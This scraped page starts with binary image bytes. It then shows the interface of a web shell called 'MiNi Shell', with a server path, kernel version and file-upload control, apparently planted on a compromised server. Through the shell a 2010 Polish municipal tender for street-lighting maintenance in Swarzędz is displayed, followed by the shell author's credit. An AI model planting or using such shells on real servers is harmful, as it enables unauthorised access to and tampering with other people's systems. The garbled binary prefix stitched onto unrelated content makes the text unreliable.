JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100118/11835-N-2010.html

<p class="kh_header"><b>Swarzędz: Konserwacja oświetlenia ulicznego na terenie miasta i gminy Swarzędz należącego do Gminy Swarzędz.</b><br>
<b>Numer ogłoszenia: 11835 - 2010; data zamieszczenia: 18.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Swarzędz , Rynek 1, 62-020 Swarzędz, woj. wielkopolskie, tel. (061) 65 12 000, faks (061) 65 12 211.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swarzedz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja oświetlenia ulicznego na terenie miasta i gminy Swarzędz należącego do Gminy Swarzędz..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Konserwacja urządzeń oświetlenia ulicznego na następujących ulicach: 
1.Geremka- 34 szt.
2.Tysiąclecia 52 szt 
3.os. Działyńskiego od Tysiąclecia do Rolnej na - 9 szt.
4.Rolna od rowu do Granicznej - 4 szt.
5.Szumana - 19 szt.
6.Borówkowa w Zalasewie - 2 szt.
7.Ukośna w Zalasewie - 5 szt. 
8.Rzepakowa w Zalasewie - 3 szt.
9.Poprzeczna w Łowęcinie - 3 szt.
10.Długa w Sarbinowie - 8 szt.
11.Gruszczyn: ul. Modrzewiowa, Leszczynowa, Krańcowa, Klonowa, Platanowa, Morwowa, Jaworowa, Jałowcowa - 97 szt. 
12.droga krajowa nr 92 w Jasiniu i Paczkowie - 24 szt. 
13.Cmentarna przy cmentarzu - 11 szt.
14.Cieszkowskiego,Polna - 67 szt.
15.Warzywna, Bednarska, Kuśnierska, Kowalska, Murarska, Płóciennicza - 38 szt.
16.Stawna - 10 szt. 
17.Plac Niezłomnych - 8 szt.
18.Miła - 4 szt
19.Spokojna od Tysiąclecia do rowu - 6 szt.
20.Jaskółcza - 6 szt.
21.Żurawia, Słowicza, Pawia - 12 szt. 
22.Szewska - 6 szt.
23.Gortatowo droga do Uzarzewa - 11 szt. 
24.Uzarzewo droga od bloków do przejazdu kolejowego - 6 szt.
25.droga krajowa na 5 oświetlenie przejść dla pieszych w Janikowie przy Vox, przy stacji Preem i Kobylnicy w rejonie ul. Brzozowej - 16 szt.
26.Złota Srebrna, Diamentowa, Bursztynowa, Staniewskiego,Hebanowa, Botaniczna, Cedrowa, Cytrusowa, Palisandrowa, Figowa w Zalasewie  -  74 szt.
27.Planetarna w Zalasewie - 15 szt.
28.Kasztelańska w Gortatowie - 5 szt.
29.Zalasewo os. Wielkopolskie + ul. Truskawkowa - 41 szt.
30.Kruszewnia ul. Spółdzielcza i Widokowa - 15 szt.
31.Jasin ul. Grudzińskiego i Łowęcin ul. Pszenna - 33 szt.
32.Bogucin ul. Zielona - 7 szt.
33.Janikowo Dolne ul. Leśna - 5 szt.
34.Swarzędz ul. Armii Poznań - 38 szt.
35.Swarzędz ul. Kupiecka - 18 szt.
36.Kobylnica, ul. Polowa,Południowa, Nizinna, Podgórna Słonecznikowa, Północna i Gruszczyn ul. Polna - 33 szt.
37.Swarzędz ul. Śniadeckich - 11 szt.
38.Swarzędz droga dojazdowa do ZS1 na os. Mielżyńskiego - 8 szt.
39.Karłowice osiedle przy ul. Kasztanowej - 8 szt.
RAZEM PUNKTÓW ŚWIETLNYCH: 772
SŁUPY STALOWE I BETONOWE
OPRAWY SGS
Zamówienie obejmuje:
1. Przeglądy całego oświetlenia min 2 razy w tygodniu,
2. Naprawy bieżące, naprawy po aktach wandalizmu oraz po kolizjach drogowych,
3. Czas przystąpienia do usuwania awarii to maksymalnie 3 godziny od zgłoszenia telefonicznego,
4. Usunięcie awarii nastąpi nie później niż w ciągu 3 dni,
5.Przedstawienie comiesięcznego wykazu robót z podaniem roboczogodzin i maszynogodzin oraz użytego materiału wraz z cenami. Zamówienie do 193.000 EURO.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 2.400,00 zł (słownie: dwa tysiące czterysta złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 2.1.O udzielenie zamówienia publicznego mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają następujące warunki:
 a)Posiadają uprawnienia do wykonywania przedmiotu zamówienia;
 b) Posiadają niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia:
- zrealizowali w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę, polegającą na konserwacji oświetlenia ulicznego obejmującego min. 500 lamp, potwierdzone dokumentami, że usługi te zostały wykonane należycie. Dokumenty muszą potwierdzać wymagany rodzaj prac, wymaganą minimalną ilość lamp, termin i miejsce realizacji;
 c)dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
- dysponują  co najmniej następującymi narzędziami i urządzeniami:
podnośnik koszowy (niski)		- 1 szt.,
samochód dostawczy			- 1 szt.,
- dysponują co najmniej 1 osobą posiadającą uprawnienia do zajmowania się eksploatacją  urządzeń, instalacji i sieci na stanowisku eksploatacji (E);
- dysponują co najmniej 1 osobą posiadającą uprawnienia do zajmowania się eksploatacją  urządzeń, instalacji i sieci na stanowisku dozoru (D);
-  dysponują co najmniej 1 osobą posiadającą uprawnienia kwalifikacyjne wykonawcze do 1 kV
 d)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
 e)Załączą do oferty dokumenty zgodnie z Rozdziałem 3.
Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie dokumentów/oświadczeń złożonych wraz z ofertą, w skali spełnia / nie spełnia (złożonych przez Wykonawców a wymaganych przez zamawiającego dokumentów i oświadczeń - zgodnie z Specyfikacją istotnych warunków zamówienia - Rozdział 3 SIWZ: Wykaz wymaganych dokumentów)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.1. Zamawiający żąda:
1.Wypełnionego i podpisanego DRUKU OFERTY (zgodnie z załączonym formularzem - ROZDZIAŁ 4);
2.Pełnomocnictwa  dla  jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych.
3.Oświadczenia o spełnieniu warunków zawartych w art. 22 ust. 1 ustawy prawo zamówień publicznych (zgodnie z ZAŁĄCZNIKIEM NR 1);
4.Upoważnienia do podpisania oferty - jeżeli nie wynika z załączonego  odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.
5.Ponadto zamawiający prosi o aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
II.1. W celu wykazania spełniania przez wykonawcę warunków zamawiający żąda następujących dokumentów:
1.Koncesji, zezwolenia lub licencji;
2.Wykazu wykonanych, a w przypadku świadczeń okresowych   lub   ciągłych   również   wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (zgodnie z  ZAŁĄCZNIKIEM NR 2), oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie;
3.Wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami (zgodnie z  ZAŁĄCZNIKIEM NR 3);
4.Pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi, wyposażenia zakładu, urządzeń technicznych, jeżeli w wykazie, o którym mowa w pkt 3, wykonawca wskazał narzędzia, wyposażenia zakładu, urządzenia techniczne, którymi będzie dysponował (zgodnie z ZAŁĄCZNIKIEM NR 5)
5.Wykazu osób, które będą uczestniczyć w wykonywaniu   zamówienia,  w  szczególności   odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami   na   temat   ich   kwalifikacji   zawodowych,   doświadczenia   i wykształcenia   niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (zgodnie z  ZAŁĄCZNIKIEM NR 4);
6.Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5, wykonawca wskazał osoby, którymi będzie dysponował (zgodnie z ZAŁĄCZNIKIEM NR 5)
7.Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (zgodnie z  ZAŁĄCZNIKIEM NR 6) ;
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, kwestię dokumentów składanych na potwierdzenie w/w faktów określa §4 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane ( Dz.U. Nr 226, poz. 1817 z 2009r.).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Czas reakcji - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.swarzedz.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego
Rynek 1
62-020 Swarzędz
pok. 410.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2010 godzina 10:00, miejsce: Siedziba Zamawiającego
Rynek 1
62-020 Swarzędz
Biuro Obsługi Interesanta - kancelaria Urzędu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com